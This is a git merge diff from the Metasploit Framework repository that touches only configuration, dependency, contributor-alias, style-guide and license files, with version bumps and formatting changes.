Land #2899 , don't stop at the first \f

Land #2900 , @todb-r7's fixups for release
Pre-release fixup
2014-01-21 14:55:26 -06:00 · 2014-01-21 14:36:07 -06:00 · 2014-01-21 13:29:08 -06:00 · 2014-01-21 12:13:14 -06:00 · 2014-01-21 11:36:24 -06:00 · 2014-01-21 10:56:49 -06:00
3950 changed files with 572202 additions and 534192 deletions
@@ -3,10 +3,7 @@
 .idea
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
-# Portable ruby version files for rvm
-.ruby-gemset
-.ruby-version
-# RVM control file
+# RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
 # YARD cache directory
 .yardoc
@@ -16,7 +13,7 @@
 config/database.yml
 # simplecov coverage data
 coverage
-data/meterpreter/ext_server_pivot.dll
+data/meterpreter/ext_server_pivot.x86.dll
 data/meterpreter/ext_server_pivot.x64.dll
 doc/
 external/source/meterpreter/java/bin
@@ -44,3 +41,13 @@ tags
 *~
 # Ignore backups of retabbed files
 *.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release
@@ -0,0 +1,3 @@
+[submodule "external/source/ReflectiveDLLInjection"]
+	path = external/source/ReflectiveDLLInjection
+	url = https://github.com/rapid7/ReflectiveDLLInjection.git
@@ -1,50 +1,57 @@
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry.volatile@gmail.com>
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 bturner-r7 <bturner-r7@github>     Brandon Turner <brandon_turner@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 dmaloney-r7 <dmaloney-r7@github>   David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 ecarey-r7 <ecarey-r7@github>       Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github>       Fernando Arias <fernando_arias@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hd_moore@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hdm@digitaloffense.net>
-jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
-jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
 jlee-r7 <jlee-r7@github>           egypt <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
+joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
 joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
+jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan_vazquez@rapid7.com>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
 shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
-tasos-r7 <tasos-r7@github>         Tasos Laskos <Tasos_Laskos@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
-wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+todb-r7 <todb-r7@github>           Tod Beardsley <todb@packetfu.com>
+trosen-r7 <trosen-r7@github>       Trevor Rosen <Trevor_Rosen@rapid7.com>
 wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
+wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>

-# Above this line are current Rapid7 employees Below this paragraph are
+# Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
 # one time or another, had some largeish number of commits landed on
 # rapid7/metasploit-framework master branch.  This should be refreshed
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry.volatile@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry@bperry-rapid7.(none)>
 Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
 Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
+ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
-Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
-bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
-ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
-corelanc0d3er <corelanc0d3er@github>   corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
+h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
 jcran <jcran@github>                   Jonathan Cran <jcran@0x0e.org>
 jcran <jcran@github>                   Jonathan Cran <jcran@rapid7.com>
 jduck <jduck@github>                   Joshua Drake <github.jdrake@qoop.org>
@@ -56,16 +63,30 @@ kris <kris@???>                        kris <>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
+Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
 nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
+OJ <oj@github>                         OJ Reeves <oj@buffered.io>
+OJ <oj@github>                         OJ <oj@buffered.io>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
+Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
+Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
+
+# Aliases for utility author names. Since they're fake, typos abound
+
+Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
@@ -1,2 +1,2 @@
 --color
--format documentation
+--format Fivemat
@@ -0,0 +1 @@
+metasploit-framework
@@ -0,0 +1 @@
+1.9.3-p484
@@ -1,11 +1,13 @@
 language: ruby
 before_install:
+  - rake --version
  - sudo apt-get update -qq
  - sudo apt-get install -qq libpcap-dev
 before_script:
  - cp config/database.yml.travis config/database.yml
-  - rake db:create
-  - rake db:migrate
+  - bundle exec rake --version
+  - bundle exec rake db:create
+  - bundle exec rake db:migrate

 rvm:
  #- '1.8.7'
@@ -15,4 +17,4 @@ notifications:
  irc: "irc.freenode.org#msfnotify"

 git:
-  depth: 1
+  depth: 5
@@ -1,7 +1,9 @@
-source 'http://rubygems.org'
+source 'https://rubygems.org'

 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
+# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
+gem 'bcrypt-ruby'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
 # Needed by msfgui and other rpc components
@@ -11,52 +13,53 @@ gem 'nokogiri'
 # Needed by anemone crawler
 gem 'robots'
 # Needed by db.rb and Msf::Exploit::Capture
-gem 'packetfu', '1.1.8'
+gem 'packetfu', '1.1.9'

 group :db do
-	# Needed for Msf::DbManager
-	gem 'activerecord'
-	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.16.6'
-	# Needed for module caching in Mdm::ModuleDetails
-	gem 'pg', '>= 0.11'
+  # Needed for Msf::DbManager
+  gem 'activerecord'
+  # Database models shared between framework and Pro.
+  gem 'metasploit_data_models', '~> 0.16.9'
+  # Needed for module caching in Mdm::ModuleDetails
+  gem 'pg', '>= 0.11'
 end

 group :pcap do
  gem 'network_interface', '~> 0.0.1'
-	# For sniffer and raw socket modules
-	gem 'pcaprub'
+  # For sniffer and raw socket modules
+  gem 'pcaprub'
 end

 group :development do
-	# Markdown formatting for yard
-	gem 'redcarpet'
-	# generating documentation
-	gem 'yard'
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
 end

 group :development, :test do
-	# supplies factories for producing model instance for specs
-	# Version 4.1.0 or newer is needed to support generate calls without the
-	# 'FactoryGirl.' in factory definitions syntax.
-	gem 'factory_girl', '>= 4.1.0'
-	# running documentation generation tasks and rspec tasks
-	gem 'rake'
+  # supplies factories for producing model instance for specs
+  # Version 4.1.0 or newer is needed to support generate calls without the
+  # 'FactoryGirl.' in factory definitions syntax.
+  gem 'factory_girl', '>= 4.1.0'
+  # Make rspec output shorter and more useful
+  gem 'fivemat', '1.2.1'
+  # running documentation generation tasks and rspec tasks
+  gem 'rake', '>= 10.0.0'
 end

 group :test do
-	# Removes records from database created during tests.  Can't use rspec-rails'
-	# transactional fixtures because multiple connections are in use so
-	# transactions won't work.
-	gem 'database_cleaner'
-	# testing framework
-	gem 'rspec', '>= 2.12'
-	# add matchers from shoulda, such as query_the_database, which is useful for
-	# testing that the Msf::DBManager activation is respected.
-	gem 'shoulda-matchers'
-	# code coverage for tests
-	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-	gem 'simplecov', '0.5.4', :require => false
-	# Manipulate Time.now in specs
-	gem 'timecop'
+  # Removes records from database created during tests.  Can't use rspec-rails'
+  # transactional fixtures because multiple connections are in use so
+  # transactions won't work.
+  gem 'database_cleaner'
+  # testing framework
+  gem 'rspec', '>= 2.12'
+  gem 'shoulda-matchers'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov', '0.5.4', :require => false
+  # Manipulate Time.now in specs
+  gem 'timecop'
 end
@@ -1,62 +1,60 @@
 GEM
-  remote: http://rubygems.org/
+  remote: https://rubygems.org/
  specs:
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
      builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
      arel (~> 3.0.2)
      tzinfo (~> 0.3.29)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
      multi_json (~> 1.0)
    arel (3.0.2)
-    bourne (1.4.0)
-      mocha (~> 0.13.2)
+    bcrypt-ruby (3.1.2)
    builder (3.0.4)
-    database_cleaner (0.9.1)
-    diff-lcs (1.2.2)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
    factory_girl (4.2.0)
      activesupport (>= 3.0.0)
-    i18n (0.6.1)
-    json (1.7.7)
-    metaclass (0.0.1)
-    metasploit_data_models (0.16.6)
+    fivemat (1.2.1)
+    i18n (0.6.5)
+    json (1.8.0)
+    metasploit_data_models (0.16.9)
      activerecord (>= 3.2.13)
      activesupport
      pg
-    mocha (0.13.3)
-      metaclass (~> 0.0.1)
-    msgpack (0.5.4)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
    multi_json (1.0.4)
    network_interface (0.0.1)
-    nokogiri (1.5.9)
-    packetfu (1.1.8)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
+    packetfu (1.1.9)
    pcaprub (0.11.3)
-    pg (0.15.1)
-    rake (10.0.4)
-    redcarpet (2.2.2)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
    robots (0.10.1)
-    rspec (2.13.0)
-      rspec-core (~> 2.13.0)
-      rspec-expectations (~> 2.13.0)
-      rspec-mocks (~> 2.13.0)
-    rspec-core (2.13.1)
-    rspec-expectations (2.13.0)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
      diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.13.0)
-    shoulda-matchers (1.5.2)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
      activesupport (>= 3.0.0)
-      bourne (~> 1.3)
    simplecov (0.5.4)
      multi_json (~> 1.0.3)
      simplecov-html (~> 0.5.3)
    simplecov-html (0.5.3)
-    timecop (0.6.1)
+    timecop (0.6.3)
    tzinfo (0.3.37)
-    yard (0.8.5.2)
+    yard (0.8.7)

 PLATFORMS
  ruby
@@ -64,17 +62,19 @@ PLATFORMS
 DEPENDENCIES
  activerecord
  activesupport (>= 3.0.0)
+  bcrypt-ruby
  database_cleaner
  factory_girl (>= 4.1.0)
+  fivemat (= 1.2.1)
  json
-  metasploit_data_models (~> 0.16.6)
+  metasploit_data_models (~> 0.16.9)
  msgpack
  network_interface (~> 0.0.1)
  nokogiri
-  packetfu (= 1.1.8)
+  packetfu (= 1.1.9)
  pcaprub
  pg (>= 0.11)
-  rake
+  rake (>= 10.0.0)
  redcarpet
  robots
  rspec (>= 2.12)
@@ -9,8 +9,8 @@ Code Style
 In order to maintain consistency and readability, we ask that you
 adhere to the following style guidelines:

- - Hard tabs, not spaces
- - Try to keep your lines under 100 columns (assuming four-space tabs)
+ - Standard Ruby two-space soft tabs, not hard tabs.
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
 - do; end instead of {} for a block
 - Always use str[0,1] instead of str[0]
   (This avoids a known ruby 1.8/1.9 incompatibility.)
@@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
 need user input, you can either register an option or expose an 
 interactive session type specific for the type of exploit.

-3. Don't use "sleep". It has been known to cause issues with
-multi-threaded programs on various platforms running an older version of
-Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
-Rex.sleep() throughout the framework. We have found this works around
-the underlying issue.
-
-4. Always use Rex sockets, not ruby sockets.  This includes
+3. Always use Rex sockets, not ruby sockets.  This includes
 third-party libraries such as Net::Http.  There are several very good
 reasons for this rule.  First, the framework doesn't get notified on
 the creation of ruby sockets and won't know how to clean them up in
@@ -54,48 +48,48 @@ already implemented with Rex and if the protocol you need is missing,
 porting another library to use them is straight-forward.  See our
 Net::SSH modifications in lib/net/ssh/ for an example.

-5. When opening an IO stream, always force binary with "b" mode (or
+4. When opening an IO stream, always force binary with "b" mode (or
 using IO#binmode). This not only helps keep Windows and non-Windows
 runtime environments consistent with each other, but also guarantees
 that files will be treated as ASCII-8BIT instead of UTF-8.

-6. Don't use String#[] for a single character.  This returns a Fixnum in
+5. Don't use String#[] for a single character.  This returns a Fixnum in
 ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
-	str[idx,1]
+  str[idx,1]
 which always returns a String.  If you need the ASCII byte, unpack it like
-so: 
-	str[idx,1].unpack("C")[0]
+so:
+  tr[idx,1].unpack("C")[0]

-7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
+6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
 The '<<' operator is significantly faster. The difference will become
 even more apparent when doing string manipulation in a loop. The
 following table approximates the underlying implementation:
-	Ruby 		Pseudo-C
-	----------- 	----------------
-	a = b + c 	a = malloc(b.len+c.len+1);
-			strcpy(a, b);
-			memcpy(a+b.len, c, c.len);
-			a[b.len + c.len] = '\0';
-	a = b 		a = b;
-	a << c 		a = realloc(a, a.len+c.len+1);
-			memcpy(a+a.len, c, c.len);
-			a[a.len + c.len] = '\0';
+
+        Ruby            Pseudo-C
+        -----------     ----------------
+        a = b + c       a = malloc(b.len+c.len+1);
+                        strcpy(a, b);
+                        memcpy(a+b.len, c, c.len);
+                        a[b.len + c.len] = '\0';
+        a = b           a = b;
+        a << c          a = realloc(a, a.len+c.len+1);
+                        memcpy(a+a.len, c, c.len);
+                        a[a.len + c.len] = '\0';
+
 Note that the original value of 'b' is lost in the second case. Care
 must be taken to duplicate strings that you do not want to modify.

-8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
+7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
 excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
 for an overview of common and not-so-common Ruby version related gotchas.

-9. Never, ever use $global variables. This applies to modules, mixins,
+8. Never, ever use $global variables. This applies to modules, mixins,
 and libraries. If you need a "global" within a specific class, you can
 use @@class_variables, but most modules should use @instance variables
-to store information between methods. 
-
-10. Do not define CONSTANTS within individual modules. This can lead to
-warning messages when the module is reloaded. Try to keep constants
-inside libraries and mixins instead.
+to store information between methods.

+9. Don't craft your XML document raw or by using Nokogiri, the current
+preferred way is REXML.

 Creating New Modules
 ====================
@@ -12,7 +12,7 @@ License: BSD-3-clause
 #
 # This license does not apply to third-party components detailed below.
 #
-# Last updated: 2013-Mar-25
+# Last updated: 2013-Nov-04
 #

 Files: data/john/*
@@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic

-Files: external/source/meterpreter/ReflectiveDLLInjection/*
-Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 License: BSD-3-clause

-Files: external/source/meterpreter/source/common/queue.h
-Copyright: 1991, 1993 The Regents of the University of California
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
-Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
-License: Zlib
-
-Files: external/source/meterpreter/source/bionic/libc/*
-Copyright: 2005-2008, The Android Open Source Project
-           2004 by Internet Systems Consortium, Inc. ("ISC")
-           1995,1996,1999 by Internet Software Consortium
-           1995 by International Business Machines, Inc.
-           1997,1998,1999,2004 The NetBSD Foundation, Inc.
-           1993 Christopher G. Demetriou
-           1983,1985,1989,1993 The Regents of the University of California
-           2000 Ben Harris
-           1995,1996,1997,1998 WIDE Project
-           2003 Networks Associates Technology, Inc.
-           1993 by Digital Equipment Corporation
-           1997 Mark Brinicombe
-           1993 Martin Birgmeier
-           1993 by Sun Microsystems, Inc.
-           1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
-           1995, 1996 Carnegie-Mellon University
-           2003 Networks Associates Technology, Inc.
-License: BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/bionic/libdl/*
-Copyright: 2007 The Android Open Source Project
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/bionic/libm/*
-Copyright: 2003, Steven G. Kargl
-           2003 Mike Barcroft <mike@FreeBSD.org>
-           2002-2005 David Schultz <das@FreeBSD.ORG>
-           2004 Stefan Farfeleder
-           2003 Dag-Erling Coïdan Smørgrav
-           1996 The NetBSD Foundation, Inc.
-           1985,1988,1991,1992,1993 The Regents of the University of California
-           1993,94 Winning Strategies, Inc.
-           1993, 2004 by Sun Microsystems, Inc.
-License: BSD-2-clause and BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/extensions/espia/screen.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
-Copyright: 2005 Vincent Liu
-License: GPL-2
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
-Copyright: 2010, patrickHVE@googlemail.com
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/pssdk/*
-Copyright: microOLAP
-License: N/A
-Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
-         SDK library embedded into the Meterpreter Sniffer extension.  This
-         source code is not distributed with Metasploit Framework.
-
-Files: external/source/meterpreter/source/openssl/*
-Copyright: 1998-2002 The OpenSSL Project
-License: OpenSSL and SSLeay
-
-Files: external/source/meterpreter/source/server/posix/sfsyscall.h
-Copyright: 2003  Philippe Biondi <biondi@cartel-securite.fr>
-License: LGPL
-
-Files: external/source/meterpreter/source/jpeg-8/*
-Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/libpcap/*
-Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
-License: BSD-4-clause
-
 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause
@@ -166,230 +83,6 @@ Files: lib/fastlib.rb
 Copyright: 2011, Rapid7 Inc.
 License: Ruby

-Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
-Copyright: 2006-2007, Francis Cianfrocca
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
-Copyright: Marc-Andre Cournoyer
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
-Copyright: 2007-2012, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
-Copyright: 2006-2010, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
-License: LGPL-2.1
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
-Copyright: 2006-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
-Copyright: 2007 David Heinemeir Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
-Copyright: 2011 Ben Johnson of Binary Logic
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
-Copyright: 2008-2012 Jonas Nicklas
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
-Copyright: 2010 Willem van Bergen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: Rob Aldred
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
-Copyright: 2005-2012 Thomas Uehlinger
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
-Copyright: 2006-2011 kuwata-lab.com all rights reserved
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
-Copyright: 2008-2010
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
-Copyright: 2011 Travis Tilley
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
-Copyright: 2011 Sam Stephenson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
-Copyright: 2010-2012 John Crepezzi
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
-Copyright: 2011 Aaron Patternson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
-Copyright: 2010 Andre Arko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
-Copyright: 2005, 2006 Tobias Luetke
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
-Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
-Copyright: 2011 John Mair (banisterfiend)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
-Copyright: 2007 Clifford Heath
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
-Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
-Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
-License: MIT
-
